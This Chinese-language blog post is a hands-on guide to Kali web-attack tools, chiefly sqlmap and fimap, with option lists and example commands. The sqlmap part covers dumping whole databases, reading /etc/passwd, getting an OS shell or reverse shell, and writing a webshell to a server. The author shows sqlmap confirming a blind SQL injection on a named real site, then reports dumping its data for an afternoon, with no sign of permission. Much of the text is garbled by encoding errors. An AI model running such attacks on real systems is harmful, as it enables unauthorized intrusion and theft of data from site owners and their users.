KaLi WEB漏洞扫描工具SQLMAP使用

sqlmap是一个sql注入神器。。。

在使用sqlmap之前,一般会手工检测下,先用 ‘查看是否报错,如果报错可以进一步分析是否有sql注入漏洞,或者是对参数进行格式化过了,有助于进一步判断漏洞是否存在,否则漏洞不存在用sqlmap白浪费时间。如果是字符型的用 and ‘1’=’1 或者 and ‘1’=’2,如果是数字型的则用 and 1=1 或者 and 1=2 或者直接一步验证 -1或者+1,同时还可以尝试fuzz用/**/和–绕过空格或正则。只要发现url可能存在问题就用sqlmap跑吧,支持get、post和带cookies注入。
判断完了后,开始进入常规的sqlmap注入流程

sqlmap -u http://localhost/index.php?id=1 #查看是否有注入点
sqlmap -u http://localhost/index.php?id=1–dbs #查看数据库列表
–current –user #获取当前数据库用户
–current –db? #获取当前数据库
-D? “mysql”? -–tables #查到mysql数据库了,查看mysql数据库下的表
-D? “mysql”? -T “admin” –columns #查看admin数据库下的列
-D? “mysql”? -T “admin” -C “username,password” –dump #获取字段内容
如果想获取整张表或者整个数据库的结构和内容,可以用-D? “mysql” -dump-all 或-D? “mysql”? -T “admin” -dump-all
-dbms “mysql” #指定数据库类型
-users #列数据库用户
-U root -passwords ? #列出指定用户 数据库密码
-start 1 -stop 20 #列出指定字段,1-20 条
-cookie #登陆的情况下需要带cookies去注入
-data “id=1&action=function” #post方式提交
–proxy? “http://0535code.com:8008” #加入代理信息
-sql-shell #sql shell

-file /etc/passwd #查看文件
-os-cmd=whoami #执行系统命令
-os-shell #系统交互shell
-os-pwn #反弹shell
-dbs-o “sqlmap.log” #保存进度
-dbs -o “sqlmap.log” -resume #恢复 已保存进度
-p “id” #指定参数id
-threads 10 #线程数,最大为10
–is-dba #判断当前使用是不是DBA
–privileges #查看权限 , –roles #查看角色
–echnique “B”#使用那种SQL注入技术
–random-agent #随机的请求头 , –user-agent=AGENT #自定义请求头
–batch #自动选择,使用默认配置 , –batch-smart # 启发式自动选择
–beep #发现漏洞时发出蜂鸣声
–purge-output #清理历史记录
–flush-session #刷新当前Session , –fresh-queries #忽略session文件,重新注入
-o “sql.log” #保存进度 , -o “sqlmap.log” -resume #恢复进度
–sql-query=”select * from tables where id=1″ #执行sql语句
-level 5 #测试级别,默认为1 , –risk 3 #测试风险,默认为1
–timeout 3 #设定连接超时时间,默认30秒
–retries 3 #等待重新连接时间,默认3秒
–threads #多线程,默认1个,最多10个
–tamper “space2morehash.py” #选择使用那种污染绕过waf
–time-sec 3 #响应延迟时间,默认为5秒
-f #判断数据库类型
-b #判断数据库版本–banner
-union-check #检查是否支持union注入
-v #详细的等级(0-6)
0:只显示Python的回溯,错误和关键消息。
1:显示信息和警告消息。
2:显示调试消息。
3:有效载荷注入。
4:显示HTTP请求。
5:显示HTTP响应头。
6:显示HTTP响应页面的内容
http://0535code.com/id/?1*.html #伪静态注入
–eval “coder” #加入python脚本代码
–batch –crawl=3 #crawl爬虫网站深度
–eta #计算注入剩余时间
–hex #使用二进制,解决字符丢失问题
–output-dir #自定义输出路径
–answers #自动选择应答
–check-waf #检查waf , –identify-waf #查找waf绕过方式
-g #使用谷歌扫描 , –gpage #谷歌扫描页数,默认100
-hpp #http参数污染
–mobile #模拟手机访问
–wizard #初级用户向导

里面是几个基本的参数使用方式,使用一下:
sqlmap -u http://www.sdjnrc.cn/Main/person.asp?uid=xx_123

Place: GET
Parameter: uid
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: uid=xx_123′ AND 7415=7415 AND ‘Uvce’=’Uvce

[23:22:55] [INFO] testing Microsoft Access
[23:22:57] [INFO] confirming Microsoft Access
[23:23:04] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP
back-end DBMS: Microsoft Access

一个基于boolean类型的盲注出来了,试过使用sqlmap拖库,如果记录值达到几百万了,会很慢,或许与我的网速也有关系,开到10个现成去跑,跑一下午不到10M数据才。没想到拿shell的办法,要想用-os-shell 需要知道web绝对路径才可以,使用的时候sqlmap会有提示,有默认的绝对路径和暴力猜解或者自定义,如果能找到网站的报错信息,可以自定义绝对路径,八成就可以拿下-os-shell了。

#如果是dba权限,而且可以爆出绝对路径可以用下面命令写入一句话 ### –is-dba
sqlmap -u http://0535code.com/test.php?id=123 –file-write /root/eval.aspx? –file-dest E:/www/test.aspx
#多线程导出所有数据库和表
sqlmap -u?http://0535code.com/test.php?id=123?–threads 10 –dump-all -v 0
#Cookies注入,当使用request获取参数时,支持GET/POST/COOKIES获取参数,只过滤了GET/POST参数,使用Cookies
sqlmap -u http://0535code.com/test.php? –cookie id=123 –level 2 –dbs

 

 

python sqlmap.py -u “http://testphp.vulnweb.com/” –batch –crawl=3  #sqlmap爬虫检测sql注入

KaLi WEB漏洞扫描工具proxystrike使用

软件介绍:http://www.edge-security.com/proxystrike.php
貌似这个神器也是类似burpsuite的,需要配置代理使用,有爬虫模块、请求报告、日志、配置等模块,目前还没有深入的研究,还是觉得burpsuite比较熟,简单的使用了下,也是图形化界面,貌似这个是pyqt写的。

proxystrike
以上是爬虫爬出一些有用的url,burpsuite用过滤器也可以实现,不过这款工具的爬虫蛮好的,这些链接可能存在sql、xxs等漏洞,敏感的url,有机会再深入用下此工具,再来完善。不知道是我的网速的原因还是软件的原因,爬的速度不快哦。

proxystrike
简单使用了下,觉得还是用burpsuite比较好,里面的功能在burpsuite基本都具有了。

KaLi WEB漏洞扫描工具padbuster使用

Use: padBuster.pl URL EncryptedSample BlockSize [options]
Where: URL = The target URL (and query string if applicable)
EncryptedSample = The encrypted value you want to test. Must
also be present in the URL, PostData or a Cookie
BlockSize = The block size being used by the algorithm

Options:
-auth [username:password]: 基本身份验证
-bruteforce: 执行对第一块蛮力
-ciphertext [Bytes]: 密文的中间字节(Hex-Encoded)
-cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
-encoding [0-4]: Encoding Format of Sample (Default 0)
0=Base64, 1=Lower HEX, 2=Upper HEX
3=.NET UrlToken, 4=WebSafe Base64
-encodedtext [Encoded String]: Data to Encrypt (Encoded)
-error [Error String]: 填充错误消息
-headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
-interactive: 提示确认解密字节
-intermediate [Bytes]:中间为密文字节(Hex-Encoded)
-log: 生成日志文件(创建文件夹PadBuster.DDMMYY)
-noencode: 默认不url编码的有效载荷(编码)
-noiv: Sample does not include IV (decrypt first block)
-plaintext [String]: 纯文本加密
-post [Post Data]: HTTP Post字符串
-prefix [Prefix]: 前缀字节添加到每个样本 (Encoded)
-proxy [address:port]: Use HTTP/S Proxy
-proxyauth [username:password]: 代理身份验证
-resume [Block Number]: Resume at this block number
-usebody: 为响应分析阶段使用响应正文内容
-verbose: 详细
-veryverbose: 非常详细的(仅调试)

网上有几篇文章是利用oracle的ms10-070漏洞写的,大概看了下这个工具主要是对于一些加密参数FUZZ测试的,目前没有合适的环境,或许还有更强大的功能。

 

KaLi WEB漏洞扫描工具OWASP ZAP使用

OWASP ZAP 也是有界面的,初识感觉跟burpsuite很像,都可以做很多事,很多事两款工具都可以实现,甚至配置方式也都是一样的。简述一下使用,后期使用下,尝试了拷在win下不能直接使用。
IE配置好代理后,点菜单的工具->选项->本地代理 改为浏览器设置的IE代理就好了。
 

owasp zap
owasp zap

KaLi WEB漏洞扫描工具nikto使用

Nikto是一款开源的(GPL)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件CGIs;超过625种服务器版本;超过230种特定服务器问题。

Option host requires an argument
-config+??????????? 使用配置文件
-Display+?????????? 开关显示文件
-dbcheck?????????? 检查数据库和语法错误的其他重要文件
-Format+????????? 保存文件 (-o) 格式
-Help??????????????? 帮助
-host+????????????? 主机
-id+????????????????? 主机身份验证使用
-list-plugins????? 列出所有可用的插件
-output+?????????? 写输出到该文件
-nossl??????????????? 禁止使用SSL
-no404????????????? 不显示4040
-Plugins+??????????运行插件列表 (default: ALL)
-port+????????????? 端口 (default 80)
-root+????????????? 该目录下所有请求
-ssl??????????????????? ssl端口
-Tuning+?????????? 扫描调优
-timeout+???????? 延时请求(default 10 seconds)
-update???????????? 升级
-Version??????????? 版本
-vhost+??????????? 主机头
Note: This is the short help output. Use -H for full help text.

网上介绍的是很强大试用下:
nikto -host 127.0.0.1 -port 8080? 或者? nikto -host 0535code.com -port 80
好像很慢的样子,不过服务器HTTP支持的方法,以及环境很快出来了,出来一个OSVDB,看了下意义不大,是一个建议,在其他web漏扫可以用下测试下,看看有那些安全隐患。

KaLi WEB漏洞扫描工具jsql使用

jsqlinjection也是java写的,跟burpsuite一样,需要jdk环境。kali下直接运行就可以看到界面了。
kali jsql
默认kali的jdk环境为1.6.0_38,jsql与该版本不兼容,需要更新下jdk版本。感觉没有sqlmap强大,果断不升级了,考虑用sqlmap吧。咦,各种工具要求的jdk环境都不同,关键是不兼容,只能有得有失了。看着界面有穿山甲的印象,想用界面的可以参考穿山甲了。
注入点:http://www.sdjnrc.cn/Main/person.asp?uid=xx_123
 

KaLi WEB漏洞扫描工具joomscan使用

?Usage:? ./joomscan.pl -u <string> -x proxy:port
-u <string>????? = joomla Url
==可选项==
-x <string:int>? = proXy to tunnel 代理到隧道
-c <string>????? = Cookie (name=value;)? cookies值
-g “<string>”??? = desired useraGent string(within “)?? userAgent
-nv????????????? = No Version fingerprinting check 没有版本的指纹识别
-nf????????????? = No Firewall detection check 不检查防火墙检测
-nvf/-nfv??????? = No version+firewall check 前面两个的组合命令
-pe ?? ??? ?? = Poke version only and Exit 版本信息,exe头叫pe,所以这里是pe不是v了
-ot????????????? = Output to Text file (target-joexploit.txt) 输出到文本文件
-oh????????????? = Output to Html file (target-joexploit.htm) 输出到html
-vu????????????? = Verbose (output every Url scan) 详细输出每个URL扫描
-sp?? ??? ?? = Show completed Percentage 显示完成百分比

?Example:? joomscan -u 0535code.com -x 127.0.0.1:8080
Check:??? joomscan check
– 检查
Update:?? joomscan update
– 更新
Download: joomscan download
– 作为一个单一的zip文件joomscan-latest.zip,下载最新版本
Defense:? joomscan defense
– 给一个防御性的说明。
About:??? joomscan story
– 关于joomscan.
Read:??? joomscan read DOCFILE
-说明

这款工具只针对 joomlacms 有效,不是通用的扫描器。目前没遇到过这款CMS,国外的貌似,收藏了。

KaLi WEB漏洞扫描工具grabber使用

Usage: grabber.py [options]
Options:
-h, –help????????? 帮助
-u ARCHIVES_URL, –url=ARCHIVES_URL 指定url
-s, –sql???????????? sql注入
-x, –xss???????????? xxs跨站
-b, –bsql????????? sql盲注
-z, –backup????? 备份文件
-d SPIDER, –spider=SPIDER 查找每一个文件
-i, –include???????? 执行文件包含漏洞攻击
-j, –javascript???? 测试JavaScript代码
-c, –crystal???????? 简单测试。
-e, –session??????? session评估

看介绍和参数,估计这款web漏扫软件应该不错,试用一下。
查跨站:grabber -x -u http://0535code.com/查备份文件:grabber -z -u http://0535code.com/
综合使用:grabber -s -x -b -z -i -j -e http://0535code.com
扫描时间比较久,目测这款web漏扫软件应该也很不错,收藏一下,继续研究下一个。
 
 

KaLi WEB漏洞扫描工具golismero使用

usage: golismero.py COMMAND [TARGETS…] [–options]
SCAN:
在给定的目标上执行漏洞扫描。
PROFILES:
显示可用配置文件列表。这个命令不需要任何参数。
PLUGINS:
显示可用插件列表。这个命令不需要任何参数。
INFO:
在给定的插件上显示详细信息。
REPORT:
从早期的扫描中写报告。这个命令不需要任何参数。
IMPORT:
导入结果从其他工具,并选择写一个报告,但不扫描目标。这个命令不需要任何参数。
DUMP:
转储数据库的早期检查和SQL格式
UPDATE:
更新

examples:

扫描一个网站,并显示在屏幕上的结果:
??? golismero scan http://www.0535code.com
获取nmap结果,扫描发现所有主机写HTML报告:
golismero scan -i nmap_output.xml -o report.html
获取结果OpenVAS和它们显示在屏幕上,但不扫描任何东西:
golismero import -i openvas_output.xml
显示所有可用配置文件的列表:
golismero profiles
显示所有可用插件的列表:
golismero plugins
显示所有信息和插件:
golismero info brute_*
从以前的扫描中转储数据库:
golismero dump -db example.db -o dump.sql

这个工具觉得还行,集成了其他很多漏扫工具,一般吧,有些环境配置的漏洞也是扫不出,果断收藏了。

KaLi WEB漏洞扫描工具fimap使用

?Fimap是一款本地及远程的文件包含漏洞检测工具!

fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

Usage: ./fimap.py [options]
## Operating Modes:
?? -s , –single???????????????? Mode to scan a single URL for FI errors.
???????????????????????????????? Needs URL (-u). This mode is the default.
?? -m , –mass?????????????????? Mode for mass scanning. Will check every URL
???????????????????????????????? from a given list (-l) for FI errors.
?? -g , –google???????????????? Mode to use Google to aquire URLs.
???????????????????????????????? Needs a query (-q) as google search query.
?? -H , –harvest??????????????? Mode to harvest a URL recursivly for new URLs.
???????????????????????????????? Needs a root url (-u) to start crawling there.
???????????????????????????????? Also needs (-w) to write a URL list for mass mode.
?? -4 , –autoawesome??????????? With the AutoAwesome mode fimap will fetch all
???????????????????????????????? forms and headers found on the site you defined
???????????????????????????????? and tries to find file inclusion bugs thru them. Needs an
???????????????????????????????? URL (-u).
## Techniques:
?? -b , –enable-blind?????????? Enables blind FI-Bug testing when no error messages are printed.
???????????????????????????????? Note that this mode will cause lots of requests compared to the
???????????????????????????????? default method. Can be used with -s, -m or -g.
?? -D , –dot-truncation???????? Enables dot truncation technique to get rid of the suffix if
???????????????????????????????? the default mode (nullbyte poison) failed. This mode can cause
???????????????????????????????? tons of requests depending how you configure it.
???????????????????????????????? By default this mode only tests windows servers.
???????????????????????????????? Can be used with -s, -m or -g. Experimental.
?? -M , –multiply-term=X??????? Multiply terminal symbols like ‘.’ and ‘/’ in the path by X.
## Variables:
?? -u , –url=URL??????????????? The URL you want to test.
???????????????????????????????? Needed in single mode (-s).
?? -l , –list=LIST????????????? The URL-LIST you want to test.
???????????????????????????????? Needed in mass mode (-m).
?? -q , –query=QUERY??????????? The Google Search QUERY.
???????????????????????????????? Example: ‘inurl:include.php’
???????????????????????????????? Needed in Google Mode (-g)
??????? –skip-pages=X?????????? Skip the first X pages from the Googlescanner.
?? -p , –pages=COUNT??????????? Define the COUNT of pages to search (-g).
???????????????????????????????? Default is 10.
??????? –results=COUNT????????? The count of results the Googlescanner should get per page.
???????????????????????????????? Possible values: 10, 25, 50 or 100(default).
??????? –googlesleep=TIME?????? The time in seconds the Googlescanner should wait befor each
???????????????????????????????? request to google. fimap will count the time between two requests
???????????????????????????????? and will sleep if it’s needed to reach your cooldown. Default is 5.
?? -w , –write=LIST???????????? The LIST which will be written if you have choosen
???????????????????????????????? harvest mode (-H). This file will be opened in APPEND mode.
?? -d , –depth=CRAWLDEPTH?????? The CRAWLDEPTH (recurse level) you want to crawl your target site
???????????????????????????????? in harvest mode (-H). Default is 1.
?? -P , –post=POSTDATA????????? The POSTDATA you want to send. All variables inside
???????????????????????????????? will also be scanned for file inclusion bugs.
??????? –cookie=COOKIES???????? Define the cookie which should be send with each request.
???????????????????????????????? Also the cookies will be scanned for file inclusion bugs.
???????????????????????????????? Concatenate multiple cookies with the ‘;’ character.
??????? –ttl=SECONDS??????????? Define the TTL (in seconds) for requests. Default is 30 seconds.
??????? –no-auto-detect???????? Use this switch if you don’t want to let fimap automaticly detect
???????????????????????????????? the target language in blind-mode. In that case you will get some
???????????????????????????????? options you can choose if fimap isn’t sure which lang it is.
??????? –bmin=BLIND_MIN???????? Define here the minimum count of directories fimap should walk thru
???????????????????????????????? in blind mode. The default number is defined in the generic.xml
??????? –bmax=BLIND_MAX???????? Define here the maximum count of directories fimap should walk thru.
??????? –dot-trunc-min=700????? The count of dots to begin with in dot-truncation mode.
??????? –dot-trunc-max=2000???? The count of dots to end with in dot-truncation mode.
??????? –dot-trunc-step=50????? The step size for each round in dot-truncation mode.
??????? –dot-trunc-ratio=0.095? The maximum ratio to detect if dot truncation was successfull.
??????? –dot-trunc-also-unix??? Use this if dot-truncation should also be tested on unix servers.
??????? –force-os=OS??????????? Forces fimap to test only files for the OS.
???????????????????????????????? OS can be ‘unix’ or ‘windows’
## Attack Kit:
?? -x , –exploit??????????????? Starts an interactive session where you can
???????????????????????????????? select a target and do some action.
?? -T , –tab-complete?????????? Enables TAB-Completation in exploit mode. Needs readline module.
???????????????????????????????? Use this if you want to be able to tab-complete thru remote
???????????????????????????????? files\dirs. Eats an extra request for every ‘cd’ command.
## Disguise Kit:
?? -A , –user-agent=UA????????? The User-Agent which should be sent.
??????? –http-proxy=PROXY?????? Setup your proxy with this option. But read this facts:
?????????????????????????????????? * The googlescanner will ignore the proxy to get the URLs,
???????????????????????????????????? but the pentest\attack itself will go thru proxy.
?????????????????????????????????? * PROXY should be in format like this: 127.0.0.1:8080
?????????????????????????????????? * It’s experimental
??????? –show-my-ip???????????? Shows your internet IP, current country and user-agent.
???????????????????????????????? Useful if you want to test your vpn\proxy config.
## Plugins:
??????? –plugins??????????????? List all loaded plugins and quit after that.
?? -I , –install-plugins??????? Shows some official exploit-mode plugins you can install
???????????????????????????????? and\or upgrade.
## Other:
??????? –update-def???????????? Checks and updates your definition files found in the
???????????????????????????????? config directory.
??????? –test-rfi?????????????? A quick test to see if you have configured RFI nicely.
??????? –merge-xml=XMLFILE????? Use this if you have another fimap XMLFILE you want to
???????????????????????????????? include to your own fimap_result.xml.
?? -C , –enable-color?????????? Enables a colorful output. Works only in linux!
??????? –force-run????????????? Ignore the instance check and just run fimap even if a lockfile
???????????????????????????????? exists. WARNING: This may erase your fimap_results.xml file!
?? -v , –verbose=LEVEL????????? Verbose level you want to receive.
???????????????????????????????? LEVEL=3 -> Debug
???????????????????????????????? LEVEL=2 -> Info(Default)
???????????????????????????????? LEVEL=1 -> Messages
???????????????????????????????? LEVEL=0 -> High-Level
??????? –credits??????????????? Shows some credits.
??????? –greetings????????????? Some greetings 😉
?? -h , –help?????????????????? Shows this cruft.
## Examples:
? 1. Scan a single URL for FI errors:
??????? ./fimap.py -u ‘http://localhost/test.php?file=bang&id=23’
? 2. Scan a list of URLS for FI errors:
??????? ./fimap.py -m -l ‘/tmp/urllist.txt’
? 3. Scan Google search results for FI errors:
??????? ./fimap.py -g -q ‘inurl:include.php’
? 4. Harvest all links of a webpage with recurse level of 3 and
???? write the URLs to /tmp/urllist
??????? ./fimap.py -H -u ‘http://localhost’ -d 3 -w /tmp/urllist

Usage: ./fimap.py [options]
## Operating Modes:
?? -s , –single???????????????? 模式扫描一个单一的网址连接的错误。需要网址(-u)。这种模式是默认的。
?? -m , –mass???????????????? 质量扫描模式。将检查每一个网址,从一个给定的列表(-l)的网络错误。
?? -g , –google?????????????? 模式使用谷歌获取URL。需要一个查询(-q)作为谷歌搜索查询
?? -H , –harvest????????????? 模式收获新的URL的URL recursivly,需要根网址(-u)开始爬行那里。还需要(-w)写一个网址列表的质量模式
?? -4 , –autoawesome?? 与autoawesome模式fimap会把所有在你定义的网站上找到的表单和标题试图找到文件包含错误通过他们。需要一个网址(-u)
## Techniques:
?? -b , –enable-blind???? 启用盲连接错误测试时,没有任何错误信息打印。请注意,这种模式将导致大量的请求相比于默认的方法。可用于-s, -m or -g。
?? -D , –dot-truncation? 使点截断技术、失败的默认模式。这种模式可以根据你如何配置的请求,默认情况下,此模式只测试windows 服务器。
?? -M , –multiply-term=X??????? 在路径中增加’.’ and ‘/’

不一一做翻译了,值挑选重要的参数吧。 需要翻译去百度翻译一下,知道大概意思。

## Examples:
? 1. 扫描一个单一的网址连接的错误:
??????? fimap -u ‘www.ihs.ac.cn/cPI.asp?id=86’
? 2. 扫描一个网络连接错误的网址列表:
??????? fimap -m -l ‘/tmp/urllist.txt’
? 3. 扫描谷歌搜索结果的网络连接错误:
??????? fimap-g -q ‘inurl:include.php’
? 4. 所有链接的网页递归水平3 写入网址列表
??????? fimap-H -u ‘http://localhost’ -d 3 -w /tmp/urllist

几乎发现不了啥,不过在php文件包含漏洞利用的时候可以考虑继续研究下这款工具。